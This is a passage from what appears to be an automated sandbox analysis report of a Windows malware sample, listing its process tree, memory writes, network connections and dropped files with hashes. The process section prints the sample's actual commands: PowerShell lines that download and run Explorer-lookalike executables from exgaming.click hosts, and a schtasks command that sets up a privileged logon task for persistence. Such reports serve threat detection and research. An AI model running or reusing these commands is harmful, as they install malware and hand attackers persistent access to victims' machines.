N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4620 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe C:\Windows\System32\cmd.exe
PID 4620 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe C:\Windows\System32\cmd.exe
PID 5004 wrote to memory of 4280 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5004 wrote to memory of 4280 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5004 wrote to memory of 5412 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5004 wrote to memory of 5412 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4620 wrote to memory of 5452 N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe C:\Windows\System32\cmd.exe
PID 4620 wrote to memory of 5452 N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe C:\Windows\System32\cmd.exe
PID 4620 wrote to memory of 5776 N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe C:\Windows\system32\cmd.exe
PID 4620 wrote to memory of 5776 N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe C:\Windows\system32\cmd.exe
PID 5776 wrote to memory of 4476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 5776 wrote to memory of 4476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 5452 wrote to memory of 4872 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 5452 wrote to memory of 4872 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 5004 wrote to memory of 644 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5004 wrote to memory of 644 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5776 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 5776 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 4956 wrote to memory of 5468 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 4956 wrote to memory of 5468 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 5468 wrote to memory of 4020 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5468 wrote to memory of 4020 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5004 wrote to memory of 5076 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5004 wrote to memory of 5076 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5468 wrote to memory of 4520 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5468 wrote to memory of 4520 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5468 wrote to memory of 5000 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5468 wrote to memory of 5000 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5468 wrote to memory of 3604 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5468 wrote to memory of 3604 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe

"C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1CE9.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Users\Admin\AppData\Roaming\system.exe

"C:\Users\Admin\AppData\Roaming\system.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3100 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 216.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
FR 51.254.53.24:4449 tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
GB 142.250.187.202:443 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
FR 51.254.53.24:4449 tcp
FR 51.254.53.24:4449 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
FR 51.254.53.24:4449 tcp
FR 51.254.53.24:4449 tcp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

memory/4620-0-0x0000000000D30000-0x0000000000D48000-memory.dmp

memory/4620-1-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/4620-3-0x000000001BB30000-0x000000001BB40000-memory.dmp

memory/4280-9-0x000001C2EA480000-0x000001C2EA4A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zjgwexnp.iti.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4280-16-0x000001C2EA4E0000-0x000001C2EA4F0000-memory.dmp

memory/4280-15-0x000001C2EA4E0000-0x000001C2EA4F0000-memory.dmp

memory/4280-17-0x000001C2EA4E0000-0x000001C2EA4F0000-memory.dmp

memory/4280-11-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/4280-20-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/5412-22-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/4620-27-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

memory/4620-34-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8432f55d21c034cd767d75efdbd407e0
SHA1 d2163aac34f4277bd55162f2609c853348852869
SHA256 62f2b61b88e4cfae117a2bb2f93201b161ef0260de36492bb75194edb4bae27e
SHA512 6c191d49f01f7efba21f0dd438fe57efb1a9051ecd39adcaddf983341e1e0cd9740013fc56af43b4bb84e602320af27e756685b6b02e60adc2d6c611c4739368

memory/5412-41-0x0000024479240000-0x0000024479250000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp1CE9.tmp.bat

MD5 68b8b3004c6cd9d6c23277ee80ba3104
SHA1 5c6e6426152be638eedceaf4ecd72c295ebde0ff
SHA256 48d4ce6ac7e27d8aeea2591a039c43a47d8e450298858dae16ce6ca40d970b7f
SHA512 f01d9b573767cf80a0f9bbaafb662d0ff1ca7183c629317f35b4bea18d154b9ba9f96fb8a637d4949480de6befb1265ea8bb9739198623d8ee1b6cb8c9ff0dc3

memory/4620-38-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

memory/5412-43-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/644-44-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/644-45-0x000002B36A990000-0x000002B36A9A0000-memory.dmp

memory/644-46-0x000002B36A990000-0x000002B36A9A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4150afd1b9345ce6edfd6aedae150451
SHA1 000189275d81e61d1ea98dbf3d58e7714d4479a0
SHA256 6bb91fceb4307177c9a3809b99e030a03d51d9ff560c5d64593754e219092322
SHA512 6e56bdd5705253d0d80e58cbd750086fbc2dc4da963e122e00fdd9edf58fada2c91915f16f3d505d65b9963bfbc4a1e9c31808befcaeaf5b8045cf1166a263fb

C:\Users\Admin\AppData\Roaming\system.exe

MD5 a7d63348cfe9b0dc9d3aaec28c76c8f0
SHA1 1b993f554960286e90cfd7cedf4c457e1c46ff80
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
SHA512 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010

memory/4956-60-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

memory/644-64-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/4020-65-0x0000016FAA3D0000-0x0000016FAA3E0000-memory.dmp

memory/4020-66-0x0000016FAA3D0000-0x0000016FAA3E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a0c1a3be9951c0898306fdf9d0c03fc7
SHA1 679a9ecccb4ac2e958a1ed8278f4c495afe41060
SHA256 3ec7afe6d748866326bc1423e0de8f1612cd15851de9240b8f1405884239bdf5
SHA512 38d9de07c7f5e010bce0898e2d4866cede51ab213e4d89cd9f1a19dc98358d29038f44c7ff4f12d26ffabb260bb37c125729fa5f6b7d74a9cd11186af3e10fc8

memory/4020-63-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/5076-77-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/5076-87-0x000001A863E80000-0x000001A863E90000-memory.dmp

memory/4020-88-0x0000016FAA3D0000-0x0000016FAA3E0000-memory.dmp

memory/5076-89-0x000001A863E80000-0x000001A863E90000-memory.dmp

memory/5076-91-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b91d1b7b4c05d577a614c9626800beb9
SHA1 9a93c28cfa2fe26a72a6352cbda4051901cfb482
SHA256 7e787720dcaec31beb92ef72e98830ebccdf18839993e12383b574af54a8ef46
SHA512 5aa49266a3d0e1007fec4e4264e951c520849563cbf3531b8654d96266e5c3b962ab52a19f6d3f3dd65802dd6e5c93fc49260b8b8e0f0567426fdd4495268e5a

memory/4020-94-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/4520-96-0x0000015F6F1C0000-0x0000015F6F1D0000-memory.dmp

memory/4520-95-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/4956-106-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

memory/4520-107-0x0000015F6F1C0000-0x0000015F6F1D0000-memory.dmp

memory/4520-109-0x0000015F6F1C0000-0x0000015F6F1D0000-memory.dmp

memory/4520-111-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/5000-112-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/5000-113-0x0000025CBE0E0000-0x0000025CBE0F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a39620b1b9c4536ebdbf57907a067201
SHA1 e4eb9beb60e8227150cd1c98e08f3ed6249c707c
SHA256 b2682b856d4500c948c4cbe2c9d66fc542819c65bdbba5bb4b31a64443a12172
SHA512 f1074424435a81c8eb6b50fd22d5c636b79df86b04a144cd9025a1184936d48e45351998fd0bc7b27fe791212d8fd6e1ac237c3111446eaada92a98615c7a9e9

memory/4956-123-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/5000-125-0x0000025CBE0E0000-0x0000025CBE0F0000-memory.dmp

memory/5000-127-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/3604-128-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/3604-129-0x000001F797590000-0x000001F7975A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 585808c4bc3ca6d78d20f1e59bf096e0
SHA1 5d682dbca5566031a416e3bfbc2acbab73dbd6dd
SHA256 f2122b010a34d88662e0ebb2f9ffa4c33ec029a5ef5dc8dc2474caeb2944df25
SHA512 c65d6c0646a302e5658f9d7ce72419ca2c4108074a5fd41599f90755790f95992cbbca503e70f82b9ae079ed6a185add95520be08c992a95775bb593edfb61b9

memory/3604-140-0x000001F797590000-0x000001F7975A0000-memory.dmp

memory/3604-142-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/4956-143-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp